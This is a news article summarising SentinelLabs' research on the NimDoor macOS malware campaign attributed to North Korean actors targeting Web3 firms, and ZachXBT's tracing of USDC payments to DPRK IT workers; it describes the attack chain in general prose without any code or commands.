SentinelLabs, the research and threat intelligence arm of cybersecurity firm SentinelOne, has delved into a new and sophisticated attack campaign called NimDoor, targeting macOS devices from DPRK bad actors.

The elaborate scheme involves using the programming language Nim to inject multiple attack chains on devices used in small Web3 businesses, which is a recent trend.

Self-proclaimed investigator ZachXBT has also uncovered a chain of payments made to Korean IT workers, which could be part of this ingenious group of hackers.

How The Attack is Executed

The detailed report by SentinelLabs describes a novel and obfuscated approach to breaching Mac devices.

It begins in a now-familiar way: by impersonating a trusted contact to schedule a meeting via Calendly, with the target subsequently receiving an email to update the Zoom application. You can find more information on this particular scam trick in our detailed report here.

The update script ends with three lines of malicious code that retrieve and execute a second-stage script from a controlled server to a legitimate Zoom meeting link.

Clicking on the link automatically downloads two Mac binaries, which initiate two independent execution chains: the first scrapes general system information and application-specific data. The second ensures that the attacker will have long-term access to the affected machine.

The attack chain then continues by installing two Bash scripts via a Trojan. One is used to target data from specific browsers: Arc, Brave, Firefox, Chrome, and Edge. The other steals Telegram’s encrypted data and the blob used to decrypt it. The data is then extracted to the controlled server.

What makes this approach unique and challenging for security analysts is the use of multiple malware components and varied techniques employed to inject and spoof malware, making it very difficult to detect.

Similar attacks have also been detected by Huntabil.IT in April and Huntress in June.

Follow The Money

ZachXBT, the pseudonymous blockchain investigator, recently posted on X with his latest findings about substantial payments made to various Democratic Peoples Republic of Korea (DPRK) developers working on diverse projects since the beginning of the year.

He has managed to identify eight separate workers working for 12 different companies.

His findings indicate that $2.76 million in USDC was sent out from Circle accounts to addresses associated with the developers per month. These addresses are very close to one that was blacklisted by Tether in 2023, as it’s tied to alleged conspirator Sim Hyon Sop.

Zach continues to monitor similar clusters of addresses, but has not made any information public, as they are still active.

He has issued a warning stating that once these workers take ownership of contracts, the underlying project is at high risk.

“I believe that when a team hires multiple DPRK ITWs (IT workers), it is a decent indicator for determining that the startup will be a failure. Unlike other threats to the industry, these workers have little sophistication, so it’s mainly the result of a team’s own negligence.”